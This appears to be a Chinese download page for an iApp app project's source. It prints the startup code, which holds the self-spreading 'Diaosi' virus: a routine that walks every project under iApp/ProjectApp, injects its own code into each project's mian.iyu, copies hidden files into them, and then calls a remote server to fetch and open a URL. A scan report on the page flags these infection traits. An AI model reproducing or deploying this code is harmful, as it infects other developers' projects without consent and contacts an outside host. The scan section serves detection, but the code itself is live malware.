[上传者]蜗壳会员514
[说明] 源码来自互联网,以下数据均来自AI处理非人工审核!请查看下列查杀再决定是否导入项目!短时间频繁使用本地下载可能会被创宇盾拦截,拦截后可以使用网盘下载!
下载地址:本地下载 网盘下载(推荐)
资源资料
启动页main.iyu载入事件部分代码
fn Root操作.初始化()
fn 手机信息.初始化()
fn 常用工具.初始化()
fn 编码转换.初始化()
s is_root="ROOT_UID=0 if [ "$UID." -eq "$ROOT_UID" ] then echo "ture" else echo "flase" fi exit 0"
.fn Root操作.检查root权限()
.fn Root操作.执行命令行2(is_root)
.fn 手机信息.取本机营业商()
.fn 手机信息.取本机号码()
fn 常用工具.联系QQ("1405125879")
syso(sss.return)
//屌丝
t()
{
fe("%.dg.d",bb)
f(bb==false)
{
fc("@.dg.d","%.dg.d",ccc)
fc("@.dg.g","%.dg.g",ccc)
}
fl("iApp/ProjectApp/", true, b)
for(cn; b)
{
ss("iApp/ProjectApp/"+cn+"/src/mian.iyu",bb)
fr(bb,bb1)
f(bb1?"屌丝")
{
}
else
{
fr("@.dg.d",bnn)
fr("%.dg.g",bn)
sj(bnn,"@2","@3",bn1)
sj(bnn,"@3","@4",bn2)
sj(bnn,"@4","@5",bn3)
sj(bb1,bn1,bn2,bb2)
f(bb2==null)
{
sj(bb1,bn3,bn2,bb2)
}
ss(bb2+bn,bb3)
sr(bb1,bb2,bb3,bb4)
fw(bb,bb4)
ss("iApp/ProjectApp/"+cn+"/res/.dg.d",vv)
ss("iApp/ProjectApp/"+cn+"/res/.dg.g",vv1)
fc("%.dg.d",vv,c)
fc("%.dg.g",vv1,c)
}
}
hs("http://www.dgwht.top/xcx/bd/cz.php","zt=2","utf-8",fk)
f(fk?"【")
{
sj(fk,"【1】","【1】",pd)
f(pd=="0")
{
sj(fk,"【2】","【2】",wz)
stop(60000)
hws(wz)
}
else
{
//不执行
}
}
else
{
}
}
源码病毒云检测评估结果
-----------------
(mian.iyu)中存在:
疑似复制项目内容到其他目录(请自行参考代码,大多数恶意代码都是通过复制项目内容到其他项目里面从而达到感染的)
疑似恶意替换目录文件(该程序可能会非法替换某个目录的文件从而造成破坏)
疑似恶意修改目录(该程序可能会为经过用户许可非法修改某个目录的所有文件,以此达到破坏目的)
遍历目录(该程序通过遍历目录达到某种目的,误报率较高)
屌丝病毒变种2(iApp最早出现的恶意代码变种,通过注入main.iyu界面达到感染,目前已提供查杀功能)
疑似通过多行换行隐藏代码1(该程序可能会通过大量换行隐藏恶意代码,并且大多数屌丝病毒是通过该换行隐藏的,目前已提供查杀功能)
疑似操作iApp界面(误报率较高,应用可能会对iApp项目界面进行操作)
屌丝病毒初代(iApp最早出现的恶意代码变种,通过注入默认目录下的源码而达到感染的目的,具有感染性 主要受害位置为:mian.iyu的载入事件 )
(mian.iyu)中存在:
疑似复制项目内容到其他目录(请自行参考代码,大多数恶意代码都是通过复制项目内容到其他项目里面从而达到感染的)
疑似恶意替换目录文件(该程序可能会非法替换某个目录的文件从而造成破坏)
疑似恶意修改目录(该程序可能会为经过用户许可非法修改某个目录的所有文件,以此达到破坏目的)
遍历目录(该程序通过遍历目录达到某种目的,误报率较高)
屌丝病毒变种2(iApp最早出现的恶意代码变种,通过注入main.iyu界面达到感染,目前已提供查杀功能)
疑似通过多行换行隐藏代码1(该程序可能会通过大量换行隐藏恶意代码,并且大多数屌丝病毒是通过该换行隐藏的,目前已提供查杀功能)
疑似操作iApp界面(误报率较高,应用可能会对iApp项目界面进行操作)
屌丝病毒初代(iApp最早出现的恶意代码变种,通过注入默认目录下的源码而达到感染的目的,具有感染性 主要受害位置为:mian.iyu的载入事件 )
随机推荐
投稿